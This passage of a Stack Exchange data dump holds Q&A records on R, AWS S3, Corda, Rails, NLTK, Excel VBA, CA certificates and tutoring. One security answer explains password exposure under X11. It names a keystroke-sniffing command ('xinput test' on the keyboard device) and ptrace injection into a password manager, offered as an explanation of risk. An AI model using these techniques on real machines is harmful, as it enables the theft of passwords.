If this works for you, please mark as correct, and optionally, upvote.\n","meta":{"source":"stackoverflow","title":"Highlight values in a data frame in R","dup_signals":{}},"subset":"stackexchange"} +{"text":"Linux Security of typing passwords via xdotool vs keyboard driver vs other solutions\n\nQuestion: I am looking for quiet universal solution how to approach software keyboard for typing passwords under Linux.\nSecurity level expectations:\nAchieve not worse (or acceptably slightly worse) security than when passwords are typed to applications on physical USB keyboard.\n(as in worst case it's starting point for many applications does not supporting more advanced means, and also, I can make\/buy hardware password manager acting as usb keyboard as alternative).\nThe scope of my concern here is comparison of attack vector\/risks of solutions based on USB keyboards or keyboard drivers vs just typing them via <code>xdootool type<\/code> ?\n(to unaware readers : copying passwords via clipboard has vector attack that any of your applications can read it)\nPlease note to all readers of question:\nIf your machine is compromised, there are plenty of ways your passwords or keys can be leaked: including stealing them from programs' memory.\nHere I would like to consider what's \"reasonable\" method of transporting passwords (definitely I am looking for something better than via clipboard), while considering tradeoffs in mind (yes, keep hardware keys, etc, whenever you can, however not all systems support those more advanced means of authorisation).\nAnswer: Any application that you've run at least once can, if it wants to, see everything that you type, read all your files, and extract your passwords from your password manager. All it has to do is inject itself somewhere into the system:\n\nTo see everything you type: connect to the X server and ask. (To see how, run <code>xtrace xinput test 42<\/code> where 42 is the device ID of your keyboard.)\nAlternatively, grab the focus without giving any visual cue (and retransmit the input to the application that looks focused, to avoid immediate detection).\nTo read all your files: <code>open<\/code>, <code>read<\/code>.\nTo extract your passwords from your password manager: read the password database file and listen in while you're typing your master password. Alternatively, inject a wrapper around the password manager process and <code>ptrace<\/code> it.\n\nYes, in theory you could notice it. But in practice, you won't.\nPutting password in the clipboard does have weaknesses, but local applications are not the problem. Local applications can get your passwords anyway. The main weaknesses of passwords in the clipboard are:\n\nBrowser bugs that allow web applications (i.e. any open browser tab) to access the clipboard.\nClipboard managers that retain a copy of the password in a place you wouldn't think of.\nAccidental pasting into the wrong field.\n\nThe safest way to manage passwords is to avoid manipulating them. This eliminates the risk of user error. So save your passwords in your web browser and have it use the password automatically.\nFor non-web uses, injecting keyboard input with <code>xdotool<\/code> is as good as it gets. Local applications can get the passwords anyway, so you aren't losing anything.\nComment: It looks like https:\/\/www.qubes-os.org security through isolation is the right way to go. Anyhow, thank you very much for this clarification to all readers. 
Even it confirms that keyboard is more secure than clipboard, your answer makes it really clear why! (And also creates more respect to browser build-in password manager:) ).\nAnswer: As it seem to me, the primary point to attack are the X11 events, which are rather easy to eavesdrop for any local application e.g. by <code>xinput test <dev><\/code>. Also X11 is the part of (most) standard distributions, and for them all input (including USB keyboards) is channeled through X11.\nThe <code>xdotool<\/code> uses X11 facilities (XTEST) to inject the requested key stroks. So I assume it sends them directly through the X11 event stack as every other input. Since you explicitly specified that your reference is a USB keyboard, I'd say this way you reach your goal of not introducing further flaws.\nNote: there are some applications like <code>gksudo<\/code> which are rather resistant to X11 sniffing, I don't know if that applies also to the <code>xdotool<\/code> input. Otherwise it would be a weakness.\n","meta":{"source":"security.stackexchange","title":"Linux Security of typing passwords via xdotool vs keyboard driver vs other solutions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Amazon S3 + Lambda (Node.JS) clarification on the s3.upload() method\n\nQuestion: I am following this tutorial wherein the programmer used this code:\n<code>await s3\n .upload({ Bucket: bucket, Key: target_filename, Body: file_stream })\n .promise();\n<\/code>\nNow, I understand that the method above would use the initialized variables <code>file_stream<\/code>, <code>bucket<\/code>, and <code>target_filename<\/code> (which he didn't bother typing out in his tutorial).\nBut the tutorial is hard to follow since (for what I know) the <code>Key<\/code> parameter inside the upload is the actual directory of the file to be re-uploaded back to S3.\nThis is confusing because at the <code>file_stream<\/code> variable, another <code>Key<\/code> parameter exists inside the method <code>getObject()<\/code>.\nSo, is the <code>filename<\/code> inside the <code>getObject()<\/code> method should be the same as <code>target_filename<\/code> of the <code>upload()<\/code> method? and can you initialize the variables mentioned just to make it clearer for this question? Thank you.\nAnswer: No, the <code>filename<\/code> inside the <code>getObject()<\/code> method may not be the same as the <code>target_filename<\/code> in <code>upload()<\/code>. Let's look at a concrete example. Suppose you have a <code>photo.zip<\/code> file stored on S3 and its key is <code>a\/b\/photo.zip<\/code>, and you want to unzip it and reupload it to <code>c\/d\/photo.jpg<\/code> assuming that the <code>photo.zip<\/code> only contains one file. Then, the <code>filename<\/code> should be <code>a\/b\/photo.zip<\/code>, and the <code>target_filename<\/code> should be <code>c\/d\/photo.jpg<\/code>. As you can see, they are clearly different.\nComment: @monkeybanana No, you can name it whatever you want. It's just an example.\nComment: Ok, it's possible. You can follow [this example](https:\/\/www.npmjs.com\/package\/unzipper#parse-zip-by-piping-entries-downstream) and get the file names in the zip file.\nComment: in regards to the `target_filename`, it should still indicate a filename and a file extension?\nComment: but how should I unzip or use the `target_filename` if the content of a zip file is multiple files that are not (using the concrete example you use) `photo.jpg`?\nComment: I don't understand your question. 
What's the usecase?\nComment: The `target_filename` should upload the same filename and file type inside the zip folder it comes from. But the problem with the tutorial is that it does not use a concrete variable example on how to use that. it just says **\"initialize the variables here\"**\nComment: Also, I don't want my newly unzipped files to be renamed into `target_filename`, I just want it to retain the variable name it has, assuming that the zip file contains multiple files inside.\n","meta":{"source":"stackoverflow","title":"Amazon S3 + Lambda (Node.JS) clarification on the s3.upload() method","dup_signals":{}},"subset":"stackexchange"} +{"text":"\/usr\/share vs \/usr\/local\/share: Where to install CA certs?\n\nQuestion: I have a VM and I want to install a CA cert on it. In other posts, some recommended copying the cert file into <code>\/usr\/share\/ca-certificates<\/code> and some recommended <code>\/usr\/local\/share\/ca-certificates\/<\/code>.\nI was wondering how are they different and which one I should use.\nAnswer: Actually the answer is in man update-ca-certificates\n\n\/usr\/local\/share\/ca-certificates - all are automatically treated as trusted\n\/usr\/share\/ca-certificates - the ones that should be trusted are selected within the file \/etc\/ca-certificates.conf\n\nMore details in this answer and its comments (and the other answers too):\nhttps:\/\/superuser.com\/questions\/437330\/how-do-you-add-a-certificate-authority-ca-to-ubuntu\/437377#437377\nAnswer: This https:\/\/en.wikipedia.org\/wiki\/Filesystem_Hierarchy_Standard should be helpful:\n\/usr\/local:\n\nTertiary hierarchy for local data, specific to this host. Typically has further subdirectories, e.g., bin, lib, share\nHistorically and strictly according to the standard, \/usr\/local is for data that must be stored on the local host (as opposed to \/usr, which may be mounted across a network). Most of the time \/usr\/local is used for installing software\/data that are not part of the standard operating system distribution (in such case, \/usr would only contain software\/data that are part of the standard operating system distribution). It is possible that the FHS standard may in the future be changed to reflect this de facto convention.\n\n\/usr\/share:\n\nArchitecture-independent (shared) data.\n\nSo I would use the <code>\/usr\/local<\/code> option.\nAnswer: It all depends on how you're going to use the certificate, and with which application. Read the documentation for that application, and it should tell you where to install your certificate.\nOr pick one, test, pick the other, test.\n","meta":{"source":"askubuntu","title":"\/usr\/share vs \/usr\/local\/share: Where to install CA certs?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I find out what the printed numbers mean on the back of an older photo?\n\nQuestion: I have two color photos from Crete, Greece. Maybe around the 1960-70's? The size of the photo is about 3-1\/2\" x 5\". I believe it had a white border but I think someone trimmed it. There is only a long number that is printed almost the full width (about 2-3\/8\" across): 034020540 and the other photo 0341001(0, 6 or 8)2. With spaces between each number. How can the photo be dated closely? Thank you.\nAnswer: These numbers were probably added by the company that printed the photographs. Their purpose is usually to record which job the prints belong to, where a \"job\" is a single film's development and printing. 
With hundreds or thousands of films being processed each day in an automated plant, tracking numbers were very helpful if there was any mix-up. The prints were put into paper wallets by hand at the end of processing, and mix-ups were possible there, as well as if there were problems in the automated parts of the process.\nThe numbering scheme would be specific to the company that did the work. Using it for dating would require identifying the company, it still being in existence and having all its old records, and being willing to go to the trouble of looking them up. Since many photo processing companies have gone out of business with the rise of digital photography, the odds of success are not good.\nSource: observations from working in a camera shop in the 1970s.\n","meta":{"source":"history.stackexchange","title":"How can I find out what the printed numbers mean on the back of an older photo?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to run corda kotlin example correctly\n\nQuestion: Problem:\nI am trying Corda official documentation hello word application. After Deploying CorDapp I issued \n<code>start IOUFlow iouValue: 99, otherParty: \"O=PartyB,L=New York,C=US\"\n<\/code>\nThis command on Party A. After doing that I tried to check the ledger state by issuing this command on Party A and B. \n<code>run vaultQuery contractStateType: com.template.states.IOUState\n<\/code>\nBut it gives the same output as the notary like this.\n<code>states: []\nstatesMetadata: []\ntotalStatesAvailable: -1\nstateTypes: \"UNCONSUMED\"\notherResults: []\n<\/code>\nBut Output should be like this.\n<code>states:\n- state:\n data:\n value: 99\n lender: \"C=GB,L=London,O=PartyA\"\n borrower: \"C=US,L=New York,O=PartyB\"\n participants:\n - \"C=GB,L=London,O=PartyA\"\n - \"C=US,L=New York,O=PartyB\"\n contract: \"com.template.contract.IOUContract\"\n notary: \"C=GB,L=London,O=Notary\"\n encumbrance: null\n constraint:\n attachmentId: \"F578320232CAB87BB1E919F3E5DB9D81B7346F9D7EA6D9155DC0F7BA8E472552\"\n ref:\n txhash: \"5CED068E790A347B0DD1C6BB5B2B463406807F95E080037208627565E6A2103B\"\n index: 0\nstatesMetadata:\n- ref:\n txhash: \"5CED068E790A347B0DD1C6BB5B2B463406807F95E080037208627565E6A2103B\"\n index: 0\n contractStateClassName: \"com.template.state.IOUState\"\n recordedTime: 1506415268.875000000\n consumedTime: null\n status: \"UNCONSUMED\"\n notary: \"C=GB,L=London,O=Notary\"\n lockId: null\n lockUpdateTime: 1506415269.548000000\ntotalStatesAvailable: -1\nstateTypes: \"UNCONSUMED\"\notherResults: []\n<\/code>\nThis is my build.gradle task deployNodes.\n<code>task deployNodes(type: net.corda.plugins.Cordform, dependsOn: ['jar']) {\n nodeDefaults {\n projectCordapp {\n deploy = true\n }\n cordapp project(':contracts')\n cordapp project(':workflows')\n }\n directory \".\/build\/nodes\"\n node {\n name \"O=Notary,L=London,C=GB\"\n notary = [validating : true]\n p2pPort 10002\n rpcSettings {\n address(\"localhost:10003\")\n adminAddress(\"localhost:10043\")\n }\n }\n node {\n name \"O=PartyA,L=London,C=GB\"\n p2pPort 10005\n rpcSettings {\n address(\"localhost:10006\")\n adminAddress(\"localhost:10046\")\n }\n rpcUsers = [[ user: \"user1\", \"password\": \"test\", \"permissions\": [\"ALL\"]]]\n }\n node {\n name \"O=PartyB,L=New York,C=US\"\n p2pPort 10008\n rpcSettings {\n address(\"localhost:10009\")\n adminAddress(\"localhost:10049\")\n }\n rpcUsers = [[ user: \"user1\", \"password\": \"test\", \"permissions\": [\"ALL\"]]]\n }\n\n}\n<\/code>\nI tried a lot to find out a solution to this 
problem on the internet but I was unable to do so as I am a newcomer to Corda. Can someone help me to solve this issue? Thank you very much.\nComment: When you ran the flow, did it complete successfully? Did you see the returned transaction hash on the screen? Also did you have all the 3 nodes (PartyA, PartyB, and Notary) up?\nComment: @AdelRustum nothing was there on the screen after starting the flow. Yeah, all three server terminals are running.\nComment: If you didn't get anything on the screen, then the flow didn't complete. Check the logs of your nodes (inside `build\/nodes\/PartyA\/logs`). You can also start the node in debug mode (https:\/\/docs.corda.net\/node-commandline.html#enabling-remote-debugging) and put breakpoints on your code to see where it's failing.\nComment: @AdelRustum Thank you very much. I got error on logs after checking it. After solving that issue my problem solved.\nComment: Ok, I'll add my remark as an answer; please accept it to mark the question as answered.\nAnswer: If you didn't get anything on the screen, then the flow didn't complete.\nCheck the logs of your nodes (inside <code>build\/nodes\/PartyA\/logs<\/code>).\nYou can also start the node in debug mode (https:\/\/docs.corda.net\/node-commandline.html#enabling-remote-debugging) and put breakpoints on your code to see where it's failing.\n","meta":{"source":"stackoverflow","title":"How to run corda kotlin example correctly","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails error : \"Unknown key: :dependant\"\n\nQuestion: When saving a form into database, I get the following error message : \nUnknown key: :dependant\nI am not sure why\nThe model in question I try to save data to is called Museum. This model is lnked to another model called Exhibition. \nHere are the two models :\n<code>class Museum < ActiveRecord::Base\n has_many :exhibitions, dependant: :destroy\nend\n<\/code>\nand Exhibition model \n<code>class Exhibition < ActiveRecord::Base\n belongs_to :museum\nend\n<\/code>\nMy Museum controller : \n<code>class MuseumsController < ApplicationController\n\ndef show\n @museum = Museum.find(params[:id])\n @museum.address = @museum.streetnumber + \" \" + @museum.streetnumbercomplement + \" \" + @museum.street + \" \" + @museum.adresscomplement + \",\" + @museum.postalcode + \" \" + @museum.city + \" \" + @museum.citycomplement\nend\n\ndef new\nend\n\ndef create\n @museum = Museum.new(museum_params)\n @museum.save\n redirect_to @museum\nend\n\nprivate\n\ndef museum_params\n params.require(:museum).\n permit(:name,:streetnumber, :streetnumbercomplement,\n :street, :adresscomplement, :postalcode, :city,\n :description, :linktowebsite, :price, :citycomplement)\n end\nend\n<\/code>\nI am building the two models controllers alltogether and have already added onto the Exhibiton tables some entries. Those entries have no reference to any Museum entry and the foreign key is probably not populated.\nShould the problem of the Exhibiton entry not refering to any museums entry cause the problem ? \nIn this case should my Rails application writing be more linear ?\n(I'd like to mention that I am mimicking Getting Started tutorial and developping by trial and error. 
Hope no previous errors are not snowballing now..)\nAnswer: Possible Typo:\ndependant ---> dependent\n","meta":{"source":"stackoverflow","title":"Rails error : \"Unknown key: :dependant\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Stanford Universal Dependencies on Python NLTK\n\nQuestion: Is there any way I can get the Universal dependencies using python, or nltk?I can only produce the parse tree.\nExample:\nInput sentence:\n<code>My dog also likes eating sausage.\n<\/code>\nOutput:\n<code>Universal dependencies\n\nnmod:poss(dog-2, My-1)\nnsubj(likes-4, dog-2)\nadvmod(likes-4, also-3)\nroot(ROOT-0, likes-4)\nxcomp(likes-4, eating-5)\ndobj(eating-5, sausage-6)\n<\/code>\nComment: See https:\/\/pypi.python.org\/pypi\/PyStanfordDependencies \/ http:\/\/stackoverflow.com\/a\/29614388\/1118542 -- PyStanfordDependencies can do Universal Dependencies now.\nAnswer: Wordseer's stanford-corenlp-python fork is a good start as it works with the recent CoreNLP release (3.5.2). However it will give you raw output, which you need manually transform. For example, given you have the wrapper running:\n<code>>>> import json, jsonrpclib\n>>> from pprint import pprint\n>>>\n>>> server = jsonrpclib.Server(\"http:\/\/localhost:8080\")\n>>>\n>>> pprint(json.loads(server.parse('John loves Mary.'))) # doctest: +SKIP\n{u'sentences': [{u'dependencies': [[u'root', u'ROOT', u'0', u'loves', u'2'],\n [u'nsubj',\n u'loves',\n u'2',\n u'John',\n u'1'],\n [u'dobj', u'loves', u'2', u'Mary', u'3'],\n [u'punct', u'loves', u'2', u'.', u'4']],\n u'parsetree': [],\n u'text': u'John loves Mary.',\n u'words': [[u'John',\n {u'CharacterOffsetBegin': u'0',\n u'CharacterOffsetEnd': u'4',\n u'Lemma': u'John',\n u'PartOfSpeech': u'NNP'}],\n [u'loves',\n {u'CharacterOffsetBegin': u'5',\n u'CharacterOffsetEnd': u'10',\n u'Lemma': u'love',\n u'PartOfSpeech': u'VBZ'}],\n [u'Mary',\n {u'CharacterOffsetBegin': u'11',\n u'CharacterOffsetEnd': u'15',\n u'Lemma': u'Mary',\n u'PartOfSpeech': u'NNP'}],\n [u'.',\n {u'CharacterOffsetBegin': u'15',\n u'CharacterOffsetEnd': u'16',\n u'Lemma': u'.',\n u'PartOfSpeech': u'.'}]]}]}\n<\/code>\nIn case you want to use dependency parser, you can reuse NLTK's DependencyGraph with a bit of effort\n<code>>>> import jsonrpclib, json\n>>> from nltk.parse import DependencyGraph\n>>>\n>>> server = jsonrpclib.Server(\"http:\/\/localhost:8080\")\n>>> parses = json.loads(\n... server.parse(\n... 'John loves Mary. '\n... 'I saw a man with a telescope. '\n... 'Ballmer has been vocal in the past warning that Linux is a threat to Microsoft.'\n... )\n... )['sentences']\n>>>\n>>> def transform(sentence):\n... for rel, _, head, word, n in sentence['dependencies']:\n... n = int(n)\n...\n... word_info = sentence['words'][n - 1][1]\n... tag = word_info['PartOfSpeech']\n... lemma = word_info['Lemma']\n... if rel == 'root':\n... # NLTK expects that the root relation is labelled as ROOT!\n... rel = 'ROOT'\n...\n... # Hack: Return values we don't know as '_'.\n... # Also, consider tag and ctag to be equal.\n... # n is used to sort words as they appear in the sentence.\n... yield n, '_', word, lemma, tag, tag, '_', head, rel, '_', '_'\n...\n>>> dgs = [\n... DependencyGraph(\n... ' '.join(items) # NLTK expects an iterable of strings...\n... for n, *items in sorted(transform(parse))\n... )\n... for parse in parses\n... 
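# build one DependencyGraph per parsed sentence\n... 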
]\n>>>\n>>> # Play around with the information we've got.\n>>>\n>>> pprint(list(dgs[0].triples()))\n[(('loves', 'VBZ'), 'nsubj', ('John', 'NNP')),\n (('loves', 'VBZ'), 'dobj', ('Mary', 'NNP')),\n (('loves', 'VBZ'), 'punct', ('.', '.'))]\n>>>\n>>> print(dgs[1].tree())\n(saw I (man a (with (telescope a))) .)\n>>>\n>>> print(dgs[2].to_conll(4)) # doctest: +NORMALIZE_WHITESPACE\nBallmer NNP 4 nsubj\nhas VBZ 4 aux\nbeen VBN 4 cop\nvocal JJ 0 ROOT\nin IN 4 prep\nthe DT 8 det\npast JJ 8 amod\nwarning NN 5 pobj\nthat WDT 13 dobj\nLinux NNP 13 nsubj\nis VBZ 13 cop\na DT 13 det\nthreat NN 8 rcmod\nto TO 13 prep\nMicrosoft NNP 14 pobj\n. . 4 punct\n<BLANKLINE>\n<\/code>\nSetting up CoreNLP is not that hard, check http:\/\/www.eecs.qmul.ac.uk\/~dm303\/stanford-dependency-parser-nltk-and-anaconda.html for more details.\n","meta":{"source":"stackoverflow","title":"Stanford Universal Dependencies on Python NLTK","dup_signals":{}},"subset":"stackexchange"} +{"text":"Best solution to insert text at defined position into image\n\nQuestion: What is the best solution to insert text at defined poition into image?\nI saw this question\/answer but it does not help me for my examples below.\nI tried the following and find some strange behaviour:\n<code>image = Image[Array[0 &, {200, 400}]];\n<\/code>\nExample 1:\n<code>text = \"This is a very long text\";\ntextImage = \n textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30]];\ncomposedImage = Show[image, textImage]\n<\/code>\n\nExample 2:\n<code>text = \"This is a very long text This is a very long text This is a very long text This is a very long text\";\ntextImage = \n textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30]];\ncomposedImage = Show[image, textImage]\n<\/code>\nHere the text is cropped.\n\nExample 3:\n<code>text = \"This is a very long text This is a very long text This is a very long text This is a very long text This is a very long text\";\ntextImage = \n textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30]];\ncomposedImage = Show[image, textImage]\n<\/code>\nI don't understand why here the text is wrapped but not left aligned.\nIt seems that when the text exceeds a certain length (probably depending on text size) this happens.\n\nWhat would you propose to insert text into an Image? \nComment: use the option `LineIndent -> 0` in `Style`. Default value is `1.`.\nComment: mrz, to get a single line use the option `LineBreakWithin -> False` in `Style`.\nComment: @kglr: If I put `LineIndent -> 0` in example 3 I get 2 rows now left aligned and wrapped. How can I have a single line although it is too long and not everything seen? In general: I believe that my way how I insert text is not the correct one. 
There must be a more elegant solution, where I also can set the position.\nComment: @kglr: Merry Christmas and thank you for your help.\nComment: mrz, Merry Christmas to you too.\nAnswer: To supress line breaks you can use the option <code>LineBreakWithin -> False<\/code> in <code>Style<\/code>:\n<code>text = \"This is a very long text This is a very long text This is a very long text This is a\n very long text This is a very long text\";\ntextImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30, LineBreakWithin -> False]];\ncomposedImage = Show[image, textImage]\n<\/code>\n\nTo prevent indents use the option <code>LineIndent -> 0<\/code>:\n<code>textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30, LineIndent -> 0]]\ncomposedImage = Show[image, textImage]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Best solution to insert text at defined position into image","dup_signals":{}},"subset":"stackexchange"} +{"text":"Excel Copy Words Which Start with \"Acc\" From Column A to B\n\nQuestion: Excel sheet\n\nI would like a an automation developed.\nStarting from A2 move contents of A2 into B3 and B4 then move contents A5 into B6 to B8, then A9 into B10 and so forth to the end \nof the records\nThe logic is if cell AX has string starting with \"Acc\" move contents into cell BX+1 If next cell AX+2 is not starting with \"Acc\" \nthen copy cell BX above and so forth till end of the data.\nStop when cell AX is blank.\nHere is my code i tried but its not working\n<code>Private Sub CommandButton1_Click()\n\n Dim recSheet As Worksheet\n Set recSheet = ThisWorkbook.Sheets(\"original\")\n\nloop through column A and find words\n'which starts with \"Acc\" if next cell is not starting with \"Acc\"\n\nLastRow = recSheet.Cells(Rows.Count, \"A\").End(xlUp).Row\nNextRow = recSheet.Cells(Rows.Count, \"A\").End(xlUp).Row + 1\n\n For i = 2 To LastRow\n\n If Range(\"A\" & i).Value = \"Acc*\" And NextRow <> \"Acc*\" Then\n Range(\"A\" & i).Select\n Selection.Cut\n\n Range(\"B\" & i\").Select\n ActiveSheet.Paste\n\n End If\nNext i\nEnd Sub\n<\/code>\nComment: Please explain how it is \"not working\". Does it do something other than expected? Does it do nothing? Does it cause an error message (if so, what is it)? Does Excel crash? Does Excel become unresponsive?\nComment: It should be \"cut\" not \"copy\"\nComment: nothing is happening and no errors too\nComment: You should add `Option Explicit` at the top of your module and `Dim` (declare) your variables. 
If you do that you will get an error at `NextRow <> \"Acc*\"` because you are trying to compare a number with a string.\nComment: i have added Option Explicit and now i have an error \" Variable not defined\"\nAnswer: Try with below code\n<code>Private Sub CommandButton1_Click()\n Dim texttocopy as String\n Dim lastrow As Long\n Dim i As Long\n Dim recSheet As Worksheet\n Set recSheet = ThisWorkbook.Sheets(\"original\")\n lastrow = recSheet.Cells(Rows.Count, \"A\").End(xlUp).Row\n For i = 2 To lastrow\n texttocopy = Range(\"A\" & i).Value\n If Range(\"A\" & i).Value Like \"Acc*\" And Not Range(\"A\" & i + 1).Value Like \"Acc*\" Then\n i = i + 1\n Do While Not Range(\"A\" & i).Value Like \"Acc*\" And Range(\"A\" & i).Value <> \"\"\n' Range(\"A\" & i).Select\n' Selection.Cut\n' Range(\"B\" & i).Select\n' ActiveSheet.Paste\n Range(\"B\" & i).Value = texttocopy\n If i >= lastrow Then\n Exit For\n Else\n i = i + 1\n End If\n Loop\n i = i - 1\n End If\n Next i\nEnd Sub\n<\/code>\nComment: @RobinsHarawa there is a `Not` missing in the second condition so maybe there are simply no matches.\nComment: @RobinsHarawa can you please show some screen shots of whats your expected result?\nComment: i have a screen short but i don't know to upload it here in the comment box\nComment: There is an edit option available at below questions . go through there and you can able to upload your screenshot by cilcking the Image icon (available at 5th left to right).\nComment: sorry to bother you but i can't find where you are talking about. your email please i can attach it and it ll be easy\nComment: Not enough Robin i understood your requirment. Will post within a second.\nComment: i have seen it and i have added \"Option Explicit\" but nothing is happening.\nNote: I have added \nDim LastRow As Integer\nDim i As Integer\nbecause there was compile error \"type missmatch\"\nComment: Nan Avan Illai-the code is able to cut and paste but it is getting dates as well. I only need those words which starts with \"Acc\" to be move from column A to B so much that i end up with, 25-09-2013 Account Code 190..\nComment: it first gave an error \"undefined variable\" then i declared \"texttocopy\" as Range. upon doing this i get this error \"Run-time error, object variable or with block variable not set\"\nComment: declare texttocopy as string\nComment: Thank you very much Nan Avan Illai it has worked the way i wanted\nComment: Don't forget to mark as answer and useful by accepting tick symbol in my post and up arrow for useful\n","meta":{"source":"stackoverflow","title":"Excel Copy Words Which Start with \"Acc\" From Column A to B","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating Subsets of data with multiple where\/between statements\n\nQuestion: I have a dataset which consists of 2 days in 2 different months and the same time periods. It shows how many occupants were in a house during the time. I want to separate the data by date, time period AND houseid.\nSo i want to get all the records where the date is 01-02-2010, between the time periods 14:00:00 - 19:00:00 where houseid is N60421A. 
At the moment data.type is stored as characters except for occupants which is numeric.\nhttp:\/\/www.sharecsv.com\/s\/aa6d4dc34acfbaf73ada1d2c8764b888\/modecsv.csv\nAtm i have tried this but i seem to get no results\n<code>data2 = subset(data, dayMonthYear == \"01\/02\/2010\" && Houses == \"N60421A\")\n<\/code>\nIn SQL i would do something like\n<code>SELECT *\nFrom data\nwhere dayMonthYear == \"01\/02\/2010\"\nAND houses == \"N60421A\"\nAND time > 14:00:00\nAND time < 19:00:00\n<\/code>\nAnswer: This should work for you...\n<code>#Combine date and time into a new POSIXct variable \"Time1\"\ndata$Time1 <- as.POSIXct(paste(data$dayMonthYear, data$Time), format=\"%d\/%m\/%Y %H:%M:%S\")\n\n#Subset \ndata2 <-subset(data, dayMonthYear == \"01\/02\/2010\" & Houses == \"N60421A\" & strftime(Time1, \"%H\") %in% c('14','15','16','17','18','19'))\n<\/code>\nYou could also use the \"chron\" package and standard R subsetting...\n<code>#Approach 2\n#Load Library\nlibrary(chron)\n\n#Convert Time from factor while creating new variable \"Time2\"\ndata$Time2 <- chron(times = as.character(data$Time))\n\n#Subset\ndata2 <- data[(data$dayMonthYear == \"01\/02\/2010\" & data$Houses == \"N60421A\" & data$Time2 >= \"14:00:00\" & data$Time2 <= \"19:00:00\" ),]\n<\/code>\nComment: Time1 actually returns N\/A when i look at the data table. Is there not a way to do this without combining the two?\nComment: I'm not sure what the problem is. Can you share your data with dput instead of providing the csv?\nComment: @KHAN I added a second approach that does not combine date and time.\n","meta":{"source":"stackoverflow","title":"Creating Subsets of data with multiple where\/between statements","dup_signals":{}},"subset":"stackexchange"} +{"text":"Advice on how to tutor a twelve year old that starts to cry?\n\nQuestion: I have a new math pupil. She is an emotional 12 year old girl who starts to cry when she doesn't understand something.\nHer father said she is sensitive. I was asked to do more praising and encouraging from her parents.\nI am looking for ways how to provide a better service.\nHave you dealt with a similar situation before? What is the best thing to do?\nComment: Are you a tutor? If so, is this tutoring one-on-one?\nComment: As her father said, she is sensitive. Building rapport looks like a good idea. I asked about her math teacher in school, whether they come in time to the class, how old is the math teacher etc. To get her point of view and to understand how does the whole math thing makes her feel. She doesn't like math. It is too abstract for her.\nComment: Take her shopping. With cash. Addition, multiplication, ratios, percent, estimation. Also a possibility to establish rapport.\nComment: @Joel Reyes Noche: Yes and yes.\nComment: \"It is too abstract for her.\" Then perhaps make it concrete. Counting geometric objects. Kirigami to fold an $n$-pointed star. Etc.\nComment: How often does she cry? If the content is too difficult for her maybe spending more time going over the basics. Be clear that you just want her to make fewer mistakes and understand more of the material, instead of zero errors and total comprehension.\nComment: @okzoomer: So far took place six lessons, she cried twice. She also has gaps in the previous knowledge.\nComment: in addition to setting realistic expectations, it also helps if you review whatever she's missing prior to going over what she's doing in class. (eg if learning subtraction of fractions best to first review subtraction of (postive and negative) integers). 
The method depends from student to student, but just do more that's keeping her engaged and do less that's keeping her frustrated. If she's getting tense or tired, just take a 3-5 minute water or bathroom or stretching break and continue after.\nAnswer: Empty praise is no good\nDo not give praise when it is not deserved. It is not healthy and does not lead to stronger character or anything else good.\nTasks with no wrong answer\nMaybe, and I am guessing here, the pupil reacts badly to being shown inadequate. Maybe mathematics has always been a subject full of right\/wrong -type exercises: you either get it or you do not, and it is right or wrong.\nHow about trying tasks that are not of this type? There are many sources for these types of questions, but one typical thing is to ask the pupil to make something. Maybe you give an answer and them to create an exercise. Or maybe it is an open exercise with free parameters the pupil can themselves choose.\nThe point here is to reduce the emotional intensity and the matter of winning and losing, showing you are smart or stupid.\nAnswer: Intense emotions surrounding math are not uncommon. Importantly, they tend to \"feed back\" on themselves - the memory of a bad experience with math makes doing math more stressful later, which then creates new bad experiences. So, taking action sooner rather than later will help immensely. Here are some suggestions.\n\nThere's no such thing as being just \"sensitive\". Emotions have a reason; the more you can find out about the reason, the better you can help. What makes this student distressed? Is it when learning something new, or when trying to use something they think they should already know? Are there particular topics that cause more stress than others? Is it starting a problem that causes stress, or does the stress kick in somewhere in the middle? Are word problems a greater stressor? Answers to any of these questions will help you figure out how to help the student.\nAs another answer here pointed out, empty praise is worse than useless. If a student picks up on you praising them for nothing, they won't trust you anymore, and they'll rely on their own judgment of how they're doing - which will always mean feeling bad about their math ability. That said, there is always something to praise honestly. When I'm working with a student in this situation, I'll often praise the process (\"see, setting it up like this was great, it was only later that things went wrong\"), inventiveness (\"well, that didn't turn out right, but it was a really cool way to approach it!\"), and even awareness (\"that's great, being able to spot when you don't know something is a super important skill\").\nLower the stakes. The perception of math as a \"right-answer-or-bust\" field is toxic. In between the right-or-wrong questions, ask questions that don't have clear-cut answers. I'm a fan of process-suggestion questions (\"which of our tools do you guess might help here?\") and even emotion questions (\"what's your gut feeling about this problem? What does that tell you?\").\nModel error-positive thinking. Many students get stressed about math because they feel (often by observation of instructors, stronger students, and popular media) that the \"right\" way to do math is to always be sure of exactly what to do next, never make mistakes, and never run into dead ends. But no one does that. The math I teach is math I've been practicing almost daily for more than a decade, and even I mess up sometimes. 
Even when I look perfect, it's just because I'm good at noticing and fixing my mistakes in my head before anyone sees them. I've found that it helps to turn off that reflex in myself: let the student see me make mistakes, puzzle over what to do next, or try something that doesn't end up working. In doing so, I can show them the right way to emotionally deal with an error: you welcome it as an opportunity to practice spotting and fixing mistakes.\nGive control, where possible. In my experience, many students think of math as something that happens to them, not something they do. And of course that's stressful - when you feel like you're fending off an attack, why wouldn't you get upset? It can help to provide opportunities for the student to take control of the situation. That can be as simple as giving them a choice about which problem to attempt next, or suggesting multiple ways to solve a problem (e.g., to find $2 \\times 3 \\times 5$, you might ask \"would you rather multiply $2 \\times 3$ first, or start with $2 \\times 5$?\").\nSelf-care is a skill. At 12, many (most?) students are still working on developing their coping mechanisms. Older students might be expected to recognize when they're feeling stressed out and frustrated, and to know what steps to take to get back on-track. But a 12-year-old probably needs help with that. Practice naming emotions, and offering simple solutions. For example: \"It seems like you're getting frustrated. Do you want to take a break for a few minutes?\" Or, \"You seem upset about this problem. Do you want to talk about why?\"\nAnswer: Her parents say she is sensitive and needs praise and encouragement, but you say she has gaps in her knowledge.\nSome 